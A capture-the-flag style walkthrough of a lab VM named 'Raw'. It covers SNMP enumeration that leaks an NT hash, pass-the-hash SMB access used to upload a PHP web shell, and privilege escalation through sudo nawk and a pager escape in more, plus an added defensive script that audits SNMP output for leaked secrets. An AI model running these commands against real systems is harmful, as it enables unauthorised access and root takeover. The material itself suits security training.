# Setting up the target

Download: Raw

NAT, IP: 192.168.1.176

# Penetration process

# Initial information gathering

```
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http         Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Site doesn't have a title (text/html).
3000/tcp open  microsoft-ds
| fingerprint-strings: 
|   SMBProgNeg: 
|     SMBr
|_    "3DUfw
```

```
┌──(root㉿kali)-[~]
└─# nmap -sU 192.168.1.176 --top-ports 100   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 04:36 EDT
Nmap scan report for 192.168.1.176
Host is up (0.00062s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 00:0C:29:96:5D:D1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 121.25 seconds
```

```
┌──(root㉿kali)-[~]
└─# onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 192.168.1.176
Scanning 1 hosts, 3219 communities
192.168.1.176 [wally] Linux raw 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64
```

```
┌──(root㉿kali)-[~]
└─# snmpwalk -v 2c -c wally 192.168.1.176
# (omitted)
iso.3.6.1.2.1.25.4.2.1.5.532 = STRING: "/usr/local/bin/smbserver.py share /var/www/html/B@ckUpW@lly -username wally -hashes :3B4C57484504038C2F2E94861D507BA7 -smb2suppo"
# (omitted)
```

The process list exposed over SNMP reveals the user, the NT hash, the absolute path and the share path.
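The same leak is easy to audit for on your own hosts. The script below is an added example, not code from the original write-up: it parses snmpwalk output, keeps only hrSWRunParameters entries (the per-PID command-line arguments), and reports any process whose arguments carry a credential-like value, with that value redacted. The sample snmpwalk lines are constructed; the smbserver.py line reproduces the one found above, the mysqldump line is invented for illustration.

```python
import re

# Constructed sample in snmpwalk's output format (not the page's full dump).
SAMPLE_SNMPWALK = '''\
iso.3.6.1.2.1.25.4.2.1.4.532 = STRING: "/usr/bin/python3"
iso.3.6.1.2.1.25.4.2.1.5.532 = STRING: "/usr/local/bin/smbserver.py share /var/www/html/B@ckUpW@lly -username wally -hashes :3B4C57484504038C2F2E94861D507BA7 -smb2suppo"
iso.3.6.1.2.1.25.4.2.1.5.640 = STRING: "-D"
iso.3.6.1.2.1.25.4.2.1.5.701 = STRING: "-u backup --password=s3cr3t wallydb"
'''

# hrSWRunParameters (HOST-RESOURCES-MIB): one entry per PID, readable by anyone who
# knows the community string. The MIB caps the string at 128 characters, which is why
# the value on this page ends mid-word at "-smb2suppo".
HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."
SNMP_STRING = re.compile(r'^(?P<oid>\S+) = STRING: "(?P<value>.*)"$')

# Argument shapes that carry a credential: "-hashes :NT", "--password x", "password=x".
# "-p" is deliberately left out: it is a port as often as a password and only adds noise.
SECRET_ARG = re.compile(
    r'(?P<flag>--?(?:hashes|password|passwd|pass|pw-nt-hash)\s+|(?:password|passwd|secret|token)=)'
    r'(?P<value>\S+)',
    re.IGNORECASE,
)


def find_leaked_secrets(snmpwalk_output: str) -> list[dict]:
    """One finding per credential-bearing argument in hrSWRunParameters, value redacted."""
    findings = []
    for line in snmpwalk_output.splitlines():
        m = SNMP_STRING.match(line.strip())
        if not m or not m.group("oid").startswith(HR_SW_RUN_PARAMETERS):
            continue
        pid = int(m.group("oid").rsplit(".", 1)[1])
        cmdline = m.group("value")
        for hit in SECRET_ARG.finditer(cmdline):
            findings.append({
                "pid": pid,
                "flag": hit.group("flag").strip(),
                # Keep the command line for the report, but never the secret itself
                "redacted": SECRET_ARG.sub(lambda s: s.group("flag") + "<REDACTED>", cmdline),
            })
    return findings


if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_SNMPWALK):
        print(f"pid {f['pid']}: {f['flag']!r} -> {f['redacted']}")
```

Feed it `snmpwalk -v 2c -c <community> <host> 1.3.6.1.2.1.25.4.2.1.5` from a monitoring host, or the same table collected by your SNMP poller; a non-empty result means a secret is visible to anyone holding the read-only community string.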

```
# smbclient //192.168.1.176/share -U wally --pw-nt-hash '3B4C57484504038C2F2E94861D507BA7' -p 3000
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D     4096  Wed Nov 29 05:06:02 2023
  ..                                  D     4096  Wed Nov 29 05:46:54 2023
                148529400 blocks of size 1024. 14851044 blocks available
smb: \> put shell.php
putting file shell.php as \shell.php (487.7 kb/s) (average 487.7 kb/s)
smb: \>
```

Start a listener, then browse to http://192.168.1.176/B@ckUpW@lly/shell.php

# Privilege escalation

```bash
sudo -u loko nawk 'BEGIN {system("/bin/sh")}'
```

sudo -l shows that more can be run on a file, and more under sudo can drop into bash. But the specified file is too short to be paged, so shrink the tty's size to force pagination on even a short file, which is what gets us into bash:

```bash
stty rows 6 columns 6
```

Then run sudo /usr/bin/more /root/Pwn3d

Type !/bin/bash directly to get a root shell, then restore the original terminal size:

```bash
stty rows 28 columns 213
```

Done.